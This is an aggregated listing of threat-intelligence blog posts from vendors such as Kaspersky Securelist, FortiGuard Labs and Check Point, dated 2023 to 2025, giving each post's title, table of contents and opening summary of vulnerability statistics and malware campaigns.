Analyzing the vulnerability landscape in Q3 2025
blogs_securelist·2025-12-03
Analyzing the vulnerability landscape in Q3 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
In the third quarter, attackers continued to exploit security flaws in WinRAR, while the total number of registered vulnerabilities grew again. In this report, we examine statistics on published vulnerabilities and exploits, the most common security issues impacting Windows and Linux, and the vulnerabilities being leveraged in APT attacks that lead to the launch of widespread C2 frameworks. The report utilizes anonymized Kaspersky Security Network data, which was consensually provided by our users, as well as information from open sources.
## Statistics on
Securelist
A new RevengeHotels campaign targets Latin America
blogs_securelist·2025-09-16·CVSS 7.8
[HIGH] A new RevengeHotels campaign targets Latin America
Table of Contents
- Background
- Initial infection
- Malicious implant
- Second loading step
- Exploring VenomRAT
- Victimology
- Conclusions
- Indicators of compromise
Authors
- Lisandro Ubiedo
## Background
RevengeHotels, also known as TA558, is a threat group that has been active since 2015, stealing credit card data from hotel guests and travelers. RevengeHotels’ modus operandi involves sending emails with phishing links which redirect victims to websites mimicking document storage. These sites, in turn, download script files to ultimately infect the targeted machines. The final payloads consist of various remote access Trojan (RAT) implants, which enable the threat actor to issue commands for controlling compromised systems, stealing sensitive data, and maintaining persistence,
Securelist
RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT
blogs_securelist·2025-09-16·CVSS 7.8
[HIGH] RevengeHotels: a new wave of attacks leveraging LLMs and VenomRAT
Table of Contents
Background
Initial infection
Malicious implant
Second loading step
Exploring VenomRAT
Anti-kill
Networking
USB spreading
Extra stealth steps
Victimology
Conclusions
Indicators of compromise
Authors
Lisandro Ubiedo
## Background
RevengeHotels, also known as TA558, is a threat group that has been active since 2015, stealing credit card data from hotel guests and travelers. RevengeHotels’ modus operandi involves sending emails with phishing links which redirect victims to websites mimicking document storage. These sites, in turn, download script files to ultimately infect the targeted machines. The final payloads consist of various remote access Trojan (RAT) implants, which enable the threat actor to issue commands for controlling compromised systems, stealin
Securelist
Exploits and vulnerabilities in Q2 2025
blogs_securelist·2025-08-27·CVSS 8.2
CVE-2025-32433 [HIGH] Exploits and vulnerabilities in Q2 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
C2 frameworks
Interesting vulnerabilities
CVE-2025-32433: vulnerability in the SSH server, part of the Erlang/OTP framework
CVE-2025-6218: directory traversal vulnerability in WinRAR
CVE-2025-3052: insecure data access vulnerability in NVRAM, allowing bypass of UEFI signature checks
CVE-2025-49113: insecure deserialization vulnerability in Roundcube Webmail
CVE-2025-1533: stack overflow vulnerability in the AsIO3.sys driver
Conclusion and advice
Authors
Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published i
Securelist
Vulnerability landscape analysis for Q2 2025
blogs_securelist·2025-08-27
Vulnerability landscape analysis for Q2 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- C2 frameworks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Vulnerability registrations in Q2 2025 proved to be quite dynamic. Vulnerabilities that were published impact the security of nearly every computer subsystem: UEFI, drivers, operating systems, browsers, as well as user and web applications. Based on our analysis, threat actors continue to leverage vulnerabilities in real-world attacks as a means of gaining access to user systems, just like in previous periods.
This report also describes known vulnerabilities used with popular C2 frameworks during the first half of 2025.
## Statistics on registered vulnera
Fortinet
How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload | FortiGuard Labs
blogs_fortinet·2025-06-05·CVSS 7.8
CVE-2017-0199 [HIGH] How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
How a Malicious Excel File (CVE-2017-0199) Delivers the FormBook Payload
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Phishing Email Initialization
CVE-2017-0199
Malicious HTA file
“sihost.exe”
AutoIt Script
Summary
Fortinet Protections
IOCs
By Shiyin Lin | June 05, 2025
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Control and Collect Sensitive Information from a Victim’s Device
Severity level: Critical
FortiGuard Labs recently observed a high-severity phishing campaign targeting old version Office Application users through malicious email attachments. The emails deliver an Excel file designed to exploit the CVE-2017-0199 vulnerability, a known flaw in old version Microsoft Office's OLE (Object Linking and Em
Securelist
Vulnerability landscape analysis for Q1 2025
blogs_securelist·2025-05-30
Vulnerability landscape analysis for Q1 2025
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NNNNN identifiers. The nature of the CVE assignment process can result in a notable delay between problem investigation and patch release, which is mitigated by reserving a CVE ID early in the process. As for trends in vulnerability exploitation, we are seeing increasing rates of attacks targeting older operating syste
Securelist
Exploits and vulnerabilities in Q1 2025
blogs_securelist·2025-05-30·CVSS 7.8
CVE-2025-21333 [HIGH] Exploits and vulnerabilities in Q1 2025
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
ZDI-CAN-25373: a vulnerability in Windows that affects how LNK files are displayed
CVE-2025-21333: a heap buffer overflow vulnerability in the vkrnlintvsp.sys driver
CVE-2025-24071: a NetNTLM hash leakage vulnerability in the file system indexer
Conclusion and advice
Authors
Alexander Kolesnikov
The first quarter of 2025 saw the continued publication of vulnerabilities discovered and fixed in 2024, as some researchers were previously unable to disclose the details. This partially shifted the focus away from vulnerabilities that received new CVE-2025-NN
Securelist
Vulnerability landscape analysis for Q4 2024
blogs_securelist·2025-02-26
Vulnerability landscape analysis for Q4 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leveraged undocumented RPC interfaces and targeted the Windows authentication mechanism.
## Statistics on registered vulnerabilities
This section contains statistics on registered vulnerabilities. Data is sourced from the CVE portal: cve.org.
Total number of registered vulnerabilities a
Securelist
Exploits and vulnerabilities in Q4 2024
blogs_securelist·2025-02-26·CVSS 6.5
CVE-2024-43572 [MEDIUM] Exploits and vulnerabilities in Q4 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most common published exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-43572—Remote code execution vulnerability in Microsoft Management Console
CVE-2024-43451—NetNTLM hash disclosure vulnerability
CVE-2024-49039—Elevation of privilege vulnerability in Windows Task Scheduler
Conclusion and advice
Authors
Alexander Kolesnikov
Q4 2024 saw fewer published exploits for Windows and Linux compared to the first three quarters. Although the number of registered vulnerabilities continued to rise, the total number of Proof of Concept (PoC) instances decreased compared to 2023. Among notable techniques in Q4, attackers leve
Dfir Report
Confluence Exploit Leads to LockBit Ransomware
blogs_dfir_report·2025-02-24·CVSS 9.8
[CRITICAL] Confluence Exploit Leads to LockBit Ransomware
From a Single Click: How Lunar Spider Enabled a Near Two-Month Intrusion Read More
- dragonforce Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware Gangs Read More
Services Overview
Threat Hunting
-
Integration
CTI Program Advisory
Incident Response Playbook
About us
Contact Us
Collaboration
Careers
Analysts
Access DFIR Labs
Get in Touch
Public Reports
Products Overview
Threat intel Overview
Threat Feed
Private DFIR Reports
All Intel
Active Defense
DFIR Labs
Case Artifacts
Detection Pack
AI Training Ground
Service Overview
Threat Hunting
Integration
CTI Program Advisory
Incident Response Playbook
Company Overview
About us
Contact Us
Careers
Analyst
SQL Brute Force Leads to BlueSky Ransomware
From OneNote to RansomNote: An Ice Col
Securelist
Exploits and vulnerabilities in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Exploits and vulnerabilities in Q3 2024
Table of Contents
Statistics on registered vulnerabilities
Exploitation statistics
Windows and Linux vulnerability exploitation
Most prevalent exploits
Vulnerability exploitation in APT attacks
Interesting vulnerabilities
CVE-2024-47177 (CUPS filters)
CVE-2024-38112 (MSHTML Spoofing)
CVE-2024-6387 (regreSSHion)
CVE-2024-3183 (Free IPA)
CVE-2024-45519 (Zimbra)
CVE-2024-5290 (Ubuntu wpa_supplicant)
Conclusion and advice
Authors
Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Co
Securelist
Analyzing the vulnerability landscape in Q3 2024
blogs_securelist·2024-12-06·CVSS 8.1
CVE-2024-47177 [HIGH] Analyzing the vulnerability landscape in Q3 2024
Table of Contents
- Statistics on registered vulnerabilities
- Exploitation statistics
- Vulnerability exploitation in APT attacks
- Interesting vulnerabilities
- CVE-2024-47177 (CUPS filters)
- CVE-2024-38112 (MSHTML Spoofing)
- CVE-2024-6387 (regreSSHion)
- CVE-2024-3183 (Free IPA)
- CVE-2024-45519 (Zimbra)
- CVE-2024-5290 (Ubuntu wpa_supplicant)
- Conclusion and advice
Authors
- Alexander Kolesnikov
Q3 2024 saw multiple vulnerabilities discovered in Windows and Linux subsystems that are not standard for cyberattacks. This is because operating system developers have been releasing new security mitigations for whole sets of vulnerabilities in commonly used subsystems. For example, a log integrity check is set to appear in the Common Log Filing System (CLFS) in Windows, so the number
Fortinet
SmokeLoader Attack Targets Companies in Taiwan | FortiGuard Labs
blogs_fortinet·2024-12-02·CVSS 7.8
[HIGH] SmokeLoader Attack Targets Companies in Taiwan | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
SmokeLoader Attack Targets Companies in Taiwan
By Pei Han Liao | December 02, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: The stolen information can be used for future attack
Severity Level: High
In September 2024, FortiGuard Labs observed an attack using the notorious SmokeLoader malware to target companies in Taiwan, including those in manufacturing, healthcare, information technology, and other sectors. SmokeLoader is well-known for its versatility and advanced evasion techniques, and its modular design allows it to perform a wide range of attacks. While SmokeLoader primarily serves as a downloader to deliver other malware, in this case, it carries out the attack itself by downloading plugins from its C2 server
Fortinet
New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs
blogs_fortinet·2024-11-08·CVSS 7.8
CVE-2017-0199 [HIGH] New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Campaign Uses Remcos RAT to Exploit Victims
Overview
The Phishing Email
CVE-2017-0199 Exploited by the Excel Document
Multiple Script Languages
Starting the Downloaded EXE
Malicious Code Runs Inside the PowerShell Process
Malicious Code Runs inside Vaccinerende.exe
Initializing Remcos
Features and Control Commands
Summary
Fortinet Protections
IOCs
By Xiaopeng Zhang | November 08, 2024
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Fully remotely control a victim’s computer
Severity level: High
Fortinet’s FortiGuard Labs recently noticed a phishing campaign in the wild. It is initialized with a phishing email containing a malicious Excel document. Upon researching the campaign, I found it was spreading a new variant of th
Fortinet
Deep Analysis of Snake Keylogger’s New Variant | FortiGuard Labs
blogs_fortinet·2024-08-28
Deep Analysis of Snake Keylogger’s New Variant | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Deep Analysis of Snake Keylogger’s New Variant
Snake Keylogger Overview
The Phishing Email
The Malicious Excel Document
VBScript Code & PowerShell Code
Dive into the Loader-Module
Dissecting the Deploy Module
Snake Keylogger Core Module and Features
Credentials Collection
Stolen Credentials Submitted Over SMTP
Snake Keylogger Summary
Fortinet Protections
IOCs
URLs
Relevant Sample SHA-256
By Xiaopeng Zhang | August 28, 2024
Affected platforms: Microsoft Windows
Impacted parties: Windows Users
Impact: Collects sensitive information from the victim’s computer
Severity level: High
Fortinet’s FortiGuard Labs recently caught a phishing campaign in the wild with a malicious Excel document attached to the phishing email. We performed a deep analysis on the campai
Securelist
Exploits and vulnerabilities in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Exploits and vulnerabilities in Q2 2024
Table of Contents
Statistics on registered vulnerabilities
Vulnerability exploitation statistics
Windows and Linux vulnerability exploitation
Most common exploits
Vulnerability exploitation in APT attacks
Exploiting vulnerable drivers to attack operating systems
BYOVD attack tools
Interesting vulnerabilities
CVE-2024-26169 (WerKernel.sys)
CVE-2024-26229 (csc.sys)
CVE-2024-4577 (PHP CGI)
Takeaways and recommendations
Authors
Vitaly Morgunov
Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not h
Securelist
Analyzing the vulnerability landscape in Q2 2024
blogs_securelist·2024-08-21·CVSS 7.8
CVE-2024-26169 [HIGH] Analyzing the vulnerability landscape in Q2 2024
Table of Contents
- Statistics on registered vulnerabilities
- Vulnerability exploitation statistics
- Vulnerability exploitation in APT attacks
- Exploiting vulnerable drivers to attack operating systems
- Interesting vulnerabilities
- CVE-2024-26169 (WerKernel.sys)
- CVE-2024-26229 (csc.sys)
- CVE-2024-4577 (PHP CGI)
- Takeaways and recommendations
Authors
- Vitaly Morgunov
- Alexander Kolesnikov
Q2 2024 was eventful in terms of new interesting vulnerabilities and exploitation techniques for applications and operating systems. Attacks through vulnerable drivers have become prevalent as a general means of privilege escalation in the operating system. Such attacks are notable in that the vulnerability does not have to be fresh, since attackers themselves deliver unpatched drivers to t
Fortinet
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers | FortiGuard Labs
blogs_fortinet·2024-08-15
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
A Deep Dive into a New ValleyRAT Campaign Targeting Chinese Speakers
First Stage Loader
Beaconing Module
AV Evasion
RuntimeBroker
Updated Loader
RemoteShellCode
Payload Downloader
ValleyRAT
Conclusion
Fortinet Protections
IOCs
By Eduardo Altares and Joie Salvio | August 15, 2024
Affected platforms: Microsoft Windows
Impacted parties: Targeted Windows users
Impact: Compromised machines are under the control of the threat actor
Severity level: Medium
FortiGuard Labs recently encountered an ongoing ValleyRAT campaign specifically targeting Chinese speakers. This malware has historically targeted e-commerce, finance, sales, and management enterprises.
ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and d
Fortinet
New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs
blogs_fortinet·2024-06-07·CVSS 7.8
CVE-2017-11882 [HIGH] New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Agent Tesla Campaign Targeting Spanish-Speaking People
The Phishing Email
The Excel Document
CVE-2017-11882 is Exploited
JavaScript Files Lead to Execute PowerShell Code
A Look into the Loader-Module
Agent Tesla Executable Module
Sensitive Information Stolen from the Victim Device
Submitting Stolen Data to an FTP Server
Summary
Fortinet Protections
IOCs
URLs
FTP Server List
Relevant Sample SHA-256
By Xiaopeng Zhang | June 07, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Windows Users
Impact: Collects sensitive information from a victim’s computer
Severity Level: Critical
A new phishing campaign was recently captured by our FortiGuard Labs that spreads a new Agent Tesla variant targeting Spanish-speaking people.
Security researchers have
Fortinet
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine | FortiGuard Labs
blogs_fortinet·2024-06-03
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Menace Unleashed: Excel File Deploys Cobalt Strike at Ukraine
Excel Document
DLL Downloader
DLL Injector
The Cobalt Strike Payload
Conclusion
Fortinet Protections
IOCs
By Cara Lin | June 03, 2024
Affected Platforms: Microsoft Windows
Impacted Users: Microsoft Windows
Impact: Compromised machines are under the control of the threat actor
Severity Level: High
FortiGuard Labs has recently identified a sophisticated cyberattack involving an Excel file embedded with a VBA macro designed to deploy a DLL file. The attacker uses a multi-stage malware strategy to deliver the notorious "Cobalt Strike" payload and establish communication with a command and control (C2) server. This attack employs various evasion techniques to ensure successful payload delivery.
Ove
Checkpoint
12th February – Threat Intelligence Report
blogs_checkpoint·2024-02-12
CVE-2022-42475 12th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 12th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th February, please download our Threat_Intelligence Bulletin .
TOP ATTACKS AND BREACHES
One of the largest unions in California, Service Employees International Union (SEIU) Local 1000, has confirmed a ransomware attack that led to network disruption. The LockBit ransomware gang has assumed responsibility, claiming to have stolen 308GB of data including sensitive employee information such as Social Securit
Checkpoint
Maldocs of Word and Excel: Vigor of the Ages
blogs_checkpoint·2024-02-08·CVSS 7.8
CVE-2017-11882 [HIGH] Maldocs of Word and Excel: Vigor of the Ages
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Maldocs of Word and Excel: Vigor of the Ages
Research by: Raman Ladutska
We chose a fantasy decoration style at certain points of the article to attract attention to the described proble
Securelist
PC malware statistics, Q3 2023
blogs_securelist·2023-12-01
PC malware statistics, Q3 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2023:
- Kaspersky solutions blocked 694,400,301 attacks from online resources across the globe.
- A total of 169,194,807 unique links were recognized as malicious by Web Anti-Virus
Securelist
Kaspersky malware report for Q3 2023
blogs_securelist·2023-12-01·CVSS 9.8
[CRITICAL] Kaspersky malware report for Q3 2023
Table of Contents
- Targeted attacks
- Other malware
Authors
- David Emm
- IT threat evolution in Q3 2023
- IT threat evolution in Q3 2023. Non-mobile statistics
- IT threat evolution in Q3 2023. Mobile statistics
## Targeted attacks
### Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Earlier this year, we reported on a new variant of SystemBC called DroxiDat that was deployed against a critical infrastructure target in South Africa. This proxy-capable backdoor was deployed alongside Cobalt Strike beacons.
The incident occurred in the third and fourth week of March, as part of a small wave of attacks involving both DroxiDat and Cobalt Strike beacons around the world; and we believe this incident may have been the initial stage of a ransomware attack.
D
Securelist
IT threat evolution in Q3 2023. Non-mobile statistics
blogs_securelist·2023-12-01
IT threat evolution in Q3 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Vulnerability exploitation
More attacks on healthcare
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT honeypots
Attacks via web resources
Countries and territories that serve as sourc
Securelist
IT threat evolution Q3 2023
blogs_securelist·2023-12-01·CVSS 9.8
CVE-2023-23397 [CRITICAL] IT threat evolution Q3 2023
Table of Contents
Targeted attacks
Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Analysis of samples exploiting CVE-2023-23397 vulnerability
Common TTPs in attacks on industrial organizations
Evil Telegram doppelganger used to target people in China
Other malware
Possible supply-chain attack on Linux machines
The Cuba ransomware gang
Leaked Lockbit 3 builder
The evolving world of crimeware
A cryptor, a stealer and a banking Trojan
Authors
David Emm
IT threat evolution in Q3 2023
IT threat evolution in Q3 2023. Non-mobile statistics
IT threat evolution in Q3 2023. Mobile statistics
## Targeted attacks
## Unknown threat actor targets power generator with DroxiDat and Cobalt Strike
Earlier this year, we reported on a new variant of SystemBC ca
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Securelist
IT threat evolution in Q2 2023. Non-mobile statistics
blogs_securelist·2023-08-30
IT threat evolution in Q2 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
MOVEit Transfer vulnerabilities exploited
Attacks on municipal organizations, educational and healthcare establishments
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks on IoT
Securelist
PC malware statistics, Q2 2022
blogs_securelist·2023-08-30
PC malware statistics, Q2 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks on IoT honeypots
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q2 2023
- IT threat evolution in Q2 2023. Non-mobile statistics
- IT threat evolution in Q2 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q2 2023:
- Kaspersky solutions blocked 801,934,281 attacks from online resources across the globe.
- A total of 209,716,810 unique links were d
Securelist
What’s happening in the world of crimeware: Emotet, DarkGate and LokiBot
blogs_securelist·2023-08-03
What’s happening in the world of crimeware: Emotet, DarkGate and LokiBot
Table of Contents
Introduction
DarkGate
LokiBot
Emotet
Conclusion
Indicators of compromise (MD5s)
Authors
GReAT
## Introduction
The malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.
While doing so, we found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. We described all three in private reports, from which this post contains an excerpt.
If you want to learn more about our crimeware reporting service, please contact us at [email protected] .
## DarkGate
In June 2023, a
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Securelist
Kaspersky crimeware report: Emotet, DarkGate and LokiBot
blogs_securelist·2023-08-03
Kaspersky crimeware report: Emotet, DarkGate and LokiBot
Table of Contents
- Introduction
- DarkGate
- LokiBot
- Emotet
- Conclusion
- Indicators of compromise (MD5s)
Authors
- GReAT
## Introduction
The malware landscape keeps evolving. New families are born, while others disappear. Some families are short-lived, while others remain active for quite a long time. In order to follow this evolution, we rely both on samples that we detect and our monitoring efforts, which cover botnets and underground forums.
While doing so, we found new Emotet samples, a new loader dubbed “DarkGate”, and a new LokiBot infostealer campaign. We described all three in private reports, from which this post contains an excerpt.
If you want to learn more about our crimeware reporting service, please contact us at [email protected].
## DarkGate
In Jun
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Fortinet
New Fast-Developing ThirdEye Infostealer Pries Open System Information | FortiGuard Labs
blogs_fortinet·2023-06-27
New Fast-Developing ThirdEye Infostealer Pries Open System Information | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
New Fast-Developing ThirdEye Infostealer Pries Open System Information
By Fred Gutierrez, James Slaughter, and Shunichi Imano | June 27, 2023
Affected platforms: Windows
Impacted parties: Windows Users
Impact: The information collected can be used for future attacks
Severity level: Medium
FortiGuard Labs recently came across files that look suspicious, even during a cursory review. Our subsequent investigation confirmed that the files are malicious and revealed there is more to them than meets the eye: they are a previously unseen infostealer we have named “ThirdEye”. While this malware is not considered sophisticated, it’s designed to steal various information from compromised machines that can be used as stepping-stones for future attacks.
This blog po
Securelist
Non-mobile malware statistics, Q1 2023
blogs_securelist·2023-06-07
Non-mobile malware statistics, Q1 2023
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Most prolific groups
- Miners
- Vulnerable applications used in cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q1 2023
- IT threat evolution in Q1 2023. Non-mobile statistics
- IT threat evolution in Q1 2023. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q1 2023:
- Kaspersky solutions blocked 865,071,227 attacks launched from online resources across the globe.
- Web Anti-Virus detected 246,912,694 unique URLs.
- Attempts to run malware fo
Securelist
IT threat evolution in Q1 2023. Non-mobile statistics
blogs_securelist·2023-06-07
IT threat evolution in Q1 2023. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Attacks on Linux and VMWare ESXi servers
Progress in combating cybercrime
Conti-based Trojan decrypted
Most prolific groups
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used in cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries/territories
Fortinet
AndoryuBot – New Botnet Campaign Targets Ruckus Wireless Admin Remote Code Execution Vulnerability (CVE-2023-25717)b| FortiGuard Labs
